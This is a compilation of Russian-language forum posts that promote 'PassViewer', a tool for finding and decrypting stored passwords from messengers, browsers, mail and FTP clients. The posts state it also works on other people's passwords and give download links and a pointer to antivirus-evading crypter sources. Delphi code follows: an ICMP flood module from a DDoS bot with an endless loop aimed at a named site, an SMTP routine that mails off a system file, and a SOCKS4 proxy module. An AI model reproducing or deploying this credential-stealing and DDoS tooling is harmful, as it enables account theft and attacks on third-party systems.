PassViewer 1.04

[URL=http://www.radikal.ru][IMG]http://s44.radikal.ru/i104/1102/32/fee88c654a84.png[/IMG][/URL]

[URL=http://www.radikal.ru][IMG]http://i063.radikal.ru/1102/53/e3e4c046e72d.png[/IMG][/URL]

Поддерживаются:

//icq
qip infium (все версии) — модуль ищет все копии программы на компьютере, некоторые пароли идут в виде МД5 (все кроме почтовых).
qip 2010 (все версии) — модуль ищет все копии программы на компьютере, некоторые пароли идут в виде МД5 (все кроме почтовых).

qip 2005 (все версии) — модуль ищет все копии программы на компьютере.

icq 6.5 — модуль ищет все копии программы на компьютере.

miranda im (все версии) — поддерживаются все версии включая новые *8, *9, *10. читается «занятый» dat файл, ищутся все портированные версии (многочисленные сборки) 834 строки программного кода!

//mail
mail.ru agent (все версии) — т.к. данные хранятся в реесте вероятность их нахождения очень высока.

thebat (все версии) — находит все копии программы, включая портированные (voyager и т.п.).

ya online — пароли в реестре, их нахождение и расшифровка не станут проблемой.

qip online — мой мир, одноклассники, вконтакте, лав планет, мамба и прочее… найдет и расшифрует. + бонус: каждому протоколу своя иконка :)

outlook express (все версии) — в старых ОС, ХР включительно, встроенный емаил клиент. Хранит пароли в Protected Storage (like IE). Вероятность нахождения почти абсолютная.

//web
internet explorer old — версии 4, 5 и 6 — используются на старых ОС. вероятность расшифровки близка к 100%

internet explorer new — версии 7, 8 и 9 — используются на новых ОС. вероятность расшифровки близка к 100%

opera browser (все версии) — мощный модуль, перекочевавший из старой версии программы. доработано: отличает типа пароля — веб, фтп или форма. ищет все копии браузера, включая многочисленные порты. работает превосходно.

firefox (все версии) — новый модуль, в основе которого не лежит та глючная херня с ddl, которая гуляет по инету. Находит и расшифровывает пароли от всех версий мозиллы и фаерфокса, включая новую 4-ку (!!!). Ищет все копии браузера, включая многочисленные порты! Отличает тип пароля — вэб или фтп.

//ftp
total commander (все версии) — старый-добрый модуль, немного поправлен. поддерживает портированные версии!

fxp (все версии) — старый-добрый модуль, добавлена версия 4. поддерживает портированные версии!

cuteftp (все версии) — новый модуль, 1504 строки кода (!!!) Ужасно сложный и не менее мощный процессор обработки паролей от САМОГО популярного фтп-клиента. Поддерживаются ВСЕ версии и их разновидности включая Pro (каждая шифрует по своему), поддерживается поиск их *.dat файлов и поиск паролей из quick connections (хранятся в реестре).

filezilla — поддерживаются только последние (опэн сорс) версии, где пароль не зашифрован. Возможно скоро будет добавленна поддержка более ранних версий, с расшифровкой.

smartftp (все версии) — приятный и достаточно популярный фтп-клиент. Расшифровка легкая.

wsftp (все версии) — серьезный фтп клиент, поддерживаются все версии и их порты

//Storage
ras — dialup passwords, хранящиеся в windows NT пароли на интернет соединения.

rdp[ — remote desktop protocol (все версии) — ищутся пароли от RDP в старых версиях ОС (хранятся в *.rdp файлах) и новые (Win Vista, Win Seven, Win 2008), хранящиеся в базе ОС.

На подходе:
— измененная FileZilla ftp
— R&Q; icq
— Google Chrome browser
— Apple Safari browser
— windows mail (win vista/7 email client)
— far ftp

Качаем: [url]http://www.sendspace.com/file/uwoz9v[/url]

я не то, чтобы дополню, а немного уточню…
для решения проблемы (скорее маленькой сложности) нужно просто подключить компонент XPMAN (например в 7-ой делфе он последний на третьей закладке)

модуль icmp DDoS бота Destination Darkness

[code]
unit m_ping;

interface

uses
Windows,
winsock;

type
ip_option_information = packed record
Ttl,
Tos,
Flags,
OptionsSize: byte;
OptionsData: Pointer;
end;

icmp_echo_reply = packed record
Address: u_long;
Status: u_long;
RTTime: u_long;
DataSize: u_short;
Reserved: u_short;
Data: Pointer;
Options: ip_option_information;
end;

PIPINFO = ^ip_option_information;
PVOID = Pointer;

function m_ping_host(address: string): string;
function InStr(I: longint): string;
function InInt(S: string): longint;

implementation

function InStr(I: longint): string;
var
S: string;
begin
Str(I, S);
InStr := S;
end;

function InInt(S: string): longint;
var
I, Code: longint;
begin
Val(S, I, Code);
InInt := I;
end;

function IcmpCreateFile(): THandle; stdcall; external 'ICMP.DLL' name 'IcmpCreateFile';
function IcmpCloseHandle(IcmpHandle: THandle): BOOL; stdcall; external 'ICMP.DLL' name 'IcmpCloseHandle';
function IcmpSendEcho(IcmpHandle: THandle;
DestAddress: u_long;
RequestData: PVOID;
RequestSize: Word;
RequestOptns: PIPINFO;
ReplyBuffer: PVOID;
ReplySize: DWORD;
Timeout: DWORD ): DWORD; stdcall; external 'ICMP.DLL' name 'IcmpSendEcho';

function m_ping_host(address: string): string;
var
hIP: THandle;
pingBuffer: array [0..32767] of Char;
pIpe: ^icmp_echo_reply;
pHostEn: PHostEnt;
wVersionRequested, error: WORD;
lwsaData: WSAData;
destAddress: In_Addr;

begin
hIP := IcmpCreateFile();
GetMem(pIpe, sizeof(icmp_echo_reply) + sizeof(pingBuffer));
pIpe.Data := @pingBuffer;
pIpe.DataSize := sizeof(pingBuffer);
wVersionRequested := MakeWord(1,1);
error := WSAStartup(wVersionRequested,lwsaData);
if (error <> 0) then
begin
result := '';
Exit;
end;
pHostEn := gethostbyname(pchar(address));
error := GetLastError();
if (error <> 0) then
begin
result := '';
Exit;
end;
destAddress := PInAddr(pHostEn^.h_addr_list^)^;
result := pHostEn^.h_name + ' [' + inet_ntoa(destAddress) + ']' + ' size: ' + InStr(sizeof(pingBuffer)) + ' bytes, ';
IcmpSendEcho(hIP, destAddress.S_addr, @pingBuffer, sizeof(pingBuffer), Nil, pIpe, sizeof(icmp_echo_reply) + sizeof(pingBuffer), 5000);
error := GetLastError();
if (error <> 0) then
begin
result := 'host not reply. error code: ' + InStr(error);
Exit;
end;
result := result + InStr(pIpe.RTTime) + 'ms';
IcmpCloseHandle(hIP);
WSACleanup();
FreeMem(pIpe);
end;

end.

[/code]

использование:
[code]
procedure dd2;
begin
while true do
m_ping_host('dom2.ru');
end;
[/code]

Обновил PassViewer до версии 1.02

Добавлена поддержка:

* internet explorer 7 (all OS)
* internet explorer 8 (all OS)
* Qip.Online — (протоколы одноклассники.ру; вконтакте.ру; мой мир; мамба.ру; ловпланет.ру; qip-друзья)

Сцылка:
[url]http://maxeg.org/files/passveiwer_1.02.zip[/url]

Зеркала:
впадлу было заливать, сори…

var
th: cardinal;

BeginThread(nil, 1024, @имя процедуры, nil, 0, th);

Прошу флуд по делу, все-таки, разрешить. Программы нуждается в тестировании и очень важно знать мнение людей. Это поможет выявить возможные ошибки и просто сделать софт лучше/удобнее.

Программа PassViewer 2010 предназначена для автоматического поиска и расшифровки утерянных/забытых/чужих паролей.

Версией 1.00 поддерживаются:

* Mirabilis ICQ 6.5
* Mozilla FireFox (3.5 or later...)
* Microsoft Internet Explorer (XP, 2003)
* Microsoft Outlook Express (all)
* RitLabs TheBat (all)
* Total Commander (all)
* Ya.Online (all)
* Mail.Ru Agent (all)
* Qip.Infium (all)
* Qip.2005a (last versions)
* Microsoft Windows NT DialUP (all)
* FlashFXP — ftp client (all)

параметры запуска:
/aggressor — закрывать процессы, которые блокируют свои файлы (icq 6.5, Mail.Ru Agent)
/log — выгрузка в лог файл, формирование отчета

скачать:
[url]http://www.sendspace.com/file/yvrnft[/url]
[url]http://ifolder.ru/15626802[/url]
[url]http://slil.ru/28391751[/url]
[url]http://depositfiles.com/files/dd6y1k5qa[/url]
[url]http://dump.ru/file/3999319[/url]

Паблик джоинеры детектируются все, т.к. антивирусные аналитики заносят их в базы тут же.

Джельтменский набор исходных кодов можно взять тут: [url]http://www.sendspace.com/file/e3xsou[/url]

Немножко «доработать напильником» и будет то, что надо.

Программа для поиска и расшифровки утерянных паролей от Qip2005 последних версий на момент релиза.

Работает в полуавтоматическом и автоматическом режимах.

Описание флагов:
ins — найден по инстялляционному пути в реестре
man — путь указан человеком
prc — найден по процессу
xp — найден по следам в Windows 2000/2003/XP
w7 — найден по следам в Windows Vista/Seven/2008

скрин:
[url]http://i.piccy.info/i4/22/bb/5e901ba6cf4f85b6e6359cca9a29.png[/url]

линки:
[url]http://dump.ru/file/3940573[/url]
[url]http://www.sendspace.com/file/v1r98h[/url]
[url]http://ifolder.ru/15471230[/url]
[url]http://slil.ru/28342854[/url]
[url]http://depositfiles.com/files/rt5k3npvm[/url]

Возможно всеми способами.

1) обращение к API бсвв матплаты из своей программы. диктуя частоту FSB, множитель, напряжение питания.

2) обращение к API спецсофта производителя, вызов его с параметром например.

3) уже рассказаный выше способ с настройкой спецсофта и последующим запуском в нужный момент.

Если ты хочешь, чтобы кто-то за тебя написал твою программу — закажи ее кому-нибудь, а так — без шансов по-видимому.

beginthread…

Нужно запустить операцию в отдельном потоке, это исключает визуальные «тормоза».

[QUOTE=--StraNger--;88041]да это вроде не кейлогерр…
[/QUOTE]
«перехватываюь нажатие клавиш» уже само по себе попадает под обределение keylogger, тобишь регистрация событий нажатия клавиш.

[QUOTE=--StraNger--;88041]
но если правда шпион собрался писать — забей на эту идею[/QUOTE]

не то чтобы забить, а отложить стоит лет на 10… до тех пор пока не будут постигнуты азы программирования…

[QUOTE=CHERNOBL;87970]Много исходников прог, которые перехватываюь нажатие клавишь и сохраняют в файл!
А как сделать, что бы перехват клавишь осуществлялся в Memo??[/QUOTE]

Ну почту отправлять тебя уже научили (хоть и через большую заднуицу в виде форм и инди), а теперь ты просишь перехват клавиш…

может за тебя сразу кейлоггер написать и выложить? )))

З.Ы. такой логгер обречен на провал в наше время, поверь человеку с более чем 10-ти летним опытом по этой теме.

Тебе дали рабочий код, целиком и полностью проверенный на mail.ru!

[code]
procedure TForm1.Button1Click(Sender: TObject);
var
IdAttachment1:TIdAttachment;
begin
IdMessage1.Body.Text := 'текст';
IdMessage1.From.Text := 'от_кого_письмо@mail.ru';
IdMessage1.Recipients.Add.Text := 'кому_письмо@mail.ru';
IdMessage1.Subject := 'тема сообщения';
IdAttachment1 := TIdAttachment.Create(IdMessage1.MessageParts,'c:\boot.ini');
IdSMTP1.AuthenticationType := atLogin;
IdSMTP1.Host := 'smtp.mail.ru';
IdSMTP1.Username := 'ganibal.789';
IdSMTP1.Password := '***********';
IdSMTP1.Connect();
if IdSMTP1.Connected
then
IdSMTP1.Send(IdMessage1);

IdSMTP1.Disconnect;
ShowMessage('good');
end;
[/code]

полный исходник тут:
[url]http://red-zone.ru/files/id_smtp.rar[/url]

Обрати внимание — IdMessage1.From.Text и IdSMTP1.Username должны совпадать, иначе сервер письмо не примет (от чужего имени письма слать запрещено на mail.ru)

Звучит как «сделайте все за меня»…
Переводим файл в бэйс64, делим на строки определеной длины (в соответствии со стандартом), а дальше просто диктуем серверу в составе текста письма…

Повторюсь, про форму бред полный (!) — это 400 кб (!) А данная задача решается в 10 кб (!)

А проверки соединения с интернетом как таковой не существует в принципе. У некоторых роутинг заведен прямо через LAN. Включил комп и в инете.

Проверяется наличие инета откликом от сайта.

[code]

program hai;

uses
wininet,
windows;

function Trim(const S: string): string;
var
I, L: Integer;
begin
L := Length(S);
I := 1;
while (I <= L) and (S[I] <= ' ') do Inc(I);
if I > L then Result := '' else
begin
while S[L] <= ' ' do Dec(L);
Result := Copy(S, I, L — I + 1);
end;
end;

function ReadInetFile(url: string): string;
var
NetHandle: HINTERNET;
UrlHandle: HINTERNET;
Buffer: array[0..1024] of char;
BytesRead: cardinal;
begin
Result := '';
if Copy(url, 1, 7) <> 'http://' then
url := 'http://' + url;
NetHandle := InternetOpen('Internet Explorer 18.0 SP26 with WM advisor', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
if Assigned(NetHandle) then
begin
UrlHandle := InternetOpenUrl(NetHandle, PChar(Url), nil, 0, INTERNET_FLAG_RELOAD, 0);
if Assigned(UrlHandle) then
begin
FillChar(Buffer, SizeOf(Buffer), 0);
repeat
Result := Result + Buffer;
FillChar(Buffer, SizeOf(Buffer), 0);
InternetReadFile(UrlHandle, @Buffer, SizeOf(Buffer), BytesRead);
until
BytesRead = 0;
InternetCloseHandle(UrlHandle);
end;
InternetCloseHandle(NetHandle);
end;
end;

procedure dure;
var
tmp: string;
begin
while true do
begin
tmp := ReadInetFile('http://твой_сайт.ру');
sleep(1000);
if trim(tmp) <> '' then
begin
MessageBox(0, pchar(trim(tmp)), 'получены данные с сайта', mb_ok);
exit;
end;
end;
end;

begin
dure;
end.

[/code]

о ужас…
форма то тут зачем?

[QUOTE=Luke;85657]Интересно, а чем сорец sw_max отличается от того, что в первом сообщении?)[/QUOTE]

Я по-другому спрошу, что в них общего? Кроме цели, которую они преследуют.
З/Ы Мой работает.

[code]
function SearchFile(Dir, Ext: string): string;
var
SearchRec: TSearchRec;
begin
if Dir <> '' then
if Dir[length(Dir)] <> '\' then
Dir := Dir + '\';
if FindFirst(Dir + '*.*', faAnyFile, SearchRec) = 0 then
repeat
if (SearchRec.name = '.') or (SearchRec.name = '..') then
continue;
if (SearchRec.Attr and faDirectory) <> 0
then
SearchFile(Dir + SearchRec.name, ext)
else
if (lowercase(ExtractFileExt(Dir + SearchRec.name)) = '.' + lowercase(ext))
or (lowercase(ExtractFileExt(Dir + SearchRec.name)) = lowercase(ext))
or (ext = '*')
or (ext = '*.*')
then
Form1.Memo1.Lines.Add(Dir + SearchRec.name)
until
FindNext(SearchRec) <> 0;
FindClose(SearchRec);
end;
[/code]

SearchFile('c:', 'jpg');

[code]

unit proxy;

interface

uses
windows,
WinSock;

type TSOCKS4_REQUEST = record
ucVersion: byte;
ucCommand: byte;
wDestPort: word;
dwDestIp: dword;
end;

var
wsaData: TWSADATA;
sport: string;
iport: word;
l_sock: TSocket;
sock4: SOCKADDR_IN;
Client: TSockAddr;
Size: integer;
h1: THandle;

function startproxy(p: integer): string;
implementation

procedure FlushRecvBufferUntil(s:TSOCKET;condition:Char);
var
iReceiveRes: integer;
cDummy: char;
begin
repeat
iReceiveRes := recv(s, cDummy, sizeof(cDummy), 0);
until NOT ((iReceiveRes<>SOCKET_ERROR) and (iReceiveRes<>0) and (cDummy<>condition));
end;

procedure SocksHandlerTreadProc(pParam:pointer); stdcall;
var
s: TSocket;
tunnelSock: TSocket;
iConnectResult: integer;
iReceiveRes: integer;
iSocketsSet: integer;
socks4Request: TSOCKS4_REQUEST;
socks4Response: TSOCKS4_REQUEST;
remoteAddr: SOCKADDR_IN;
fds_read: TFDset;
tv: TTimeval;
cSocksVersion: byte;
iSelectResult: integer;
loop: integer;
ulVal: u_long;
swapBuffer: array[0..4096*16-1] of char;
iRecvResult: integer;
begin
s := TSOCKET(pParam);
tunnelSock := 0;
loop := 0;
while loop=0 do
begin
inc(loop);
iConnectResult := 0;
iReceiveRes := 0;
iSocketsSet := 0;
FD_ZERO(fds_read);
FD_SET(s, fds_read);
tv.tv_sec := 30;
cSocksVersion := 0;
iSelectResult := select(0, @fds_read, nil, nil, @tv);
if (iSelectResult=SOCKET_ERROR) or (not iSelectResult>0) then break;
ulVal := 0;
ioctlsocket(s, FIONBIO, ulVal);
iReceiveRes := recv(s, cSocksVersion, 1, MSG_PEEK);
if cSocksVersion=4 then
begin
iReceiveRes := recv(s, socks4Request, sizeof(socks4Request), 0);
if iReceiveRes=SOCKET_ERROR then break;
ulVal := 1;
ioctlsocket(s, FIONBIO, ulVal);
FlushRecvBufferUntil(s, #0);
if socks4Request.ucCommand = 1 then
begin
ulVal := 0;
ioctlsocket(s, FIONBIO, ulVal);
remoteAddr.sin_family := AF_INET;
move(socks4Request.dwDestIp,remoteAddr.sin_addr,sizeof(remoteAddr.sin_addr));
remoteAddr.sin_port := socks4Request.wDestPort;
tunnelSock := socket(AF_INET, SOCK_STREAM, 0);
iConnectResult := connect(tunnelSock, remoteAddr, sizeof(remoteAddr));
if (iConnectResult<>SOCKET_ERROR) then
begin
socks4Response.ucCommand := 90;
socks4Response.ucVersion := 0;
send(s, socks4Response, sizeof(socks4Response), 0);
end else break;
end else break;
end else break;
ulVal := 0;
ioctlsocket(tunnelSock, FIONBIO, ulVal);
ioctlsocket(s, FIONBIO, ulVal);
fillchar(swapBuffer,sizeof(swapBuffer),0);
tv.tv_sec := 2;
while true do
begin
FD_ZERO(fds_read);
FD_SET(s, fds_read);
FD_SET(tunnelSock, fds_read);
iSocketsSet := select(0, @fds_read, nil, nil, @tv);
if iSocketsSet > 0 then
begin
if FD_ISSET(s, fds_read) then
begin
iRecvResult := recv(s, swapBuffer, sizeof(swapBuffer), MSG_PEEK);
if (iRecvResult=0)
then break
else iRecvResult := recv(s, swapBuffer, sizeof(swapBuffer), 0);
if (iRecvResult <> SOCKET_ERROR) and (iRecvResult > 0)
then send(tunnelSock, swapBuffer, iRecvResult, 0)
else BREAK;
end;

if (FD_ISSET(tunnelSock, fds_read)) then
begin
iRecvResult := recv(tunnelSock, swapBuffer, sizeof(swapBuffer), MSG_PEEK);
if iRecvResult = 0
then break
else iRecvResult := recv(tunnelSock, swapBuffer, sizeof(swapBuffer), 0);
if (iRecvResult <> SOCKET_ERROR) and (iRecvResult > 0)
then send(s, swapBuffer, iRecvResult, 0)
else break;
end;
end;
end;
end;
closesocket(s);
closesocket(tunnelSock);
end;

function startproxy (p: integer): string;
begin
WSAStartup(MAKEWORD(2, 0), wsaData);
l_sock := socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
sock4.sin_family := AF_INET;
sock4.sin_port := htons(p);
sock4.sin_addr.s_addr := INADDR_ANY;
Size := SizeOf(Client);
if (Bind(l_sock, sock4, SizeOf(sock4)) = 0) and (Listen(l_sock, $FF) = 0) then
while true do CreateThread(nil, 0, @SocksHandlerTreadProc, Pointer(accept(l_sock, @Client, @Size)), 0, h1);
end;

end.

[/code]

не нужно тут никакого НАТа, достаточно просто открыть порт. А ай-пи и без провайдера можно статическим сделать. Куча сервисов — выделяющих тебе ай-пи из своего диапазаона, на сервер лишь нужно установить клиент, для работы с сервисом и и все пакеты идущие на ай-пи будут маршрутизироватся на твой сервер.

Вот скажите мне — на кой $#@ нормальному человеку перепрошивать IMEI ?!?!?!

Лично я считаю что…
1) это может понадобится лишь ворам (гоп-стоп)
2) в большинстве случаев это технически не возможно.

От себя добавлю что ищутся ворованные трубки ЭЛЕМЕНТАРНО, и вычислят и запеленгуют без проблем!

За трубку статью получишь да еще и лишнего подвесят (чтобы жизнь малиной не казалась), т.ч. вывод единственно правильный — НЕ ВОРУЙТЕ люди трубки и НЕ ПОКУПАЙТЕ «по дешевке» у всяких интернет-барыг-гопников (ни какой это не кофискат).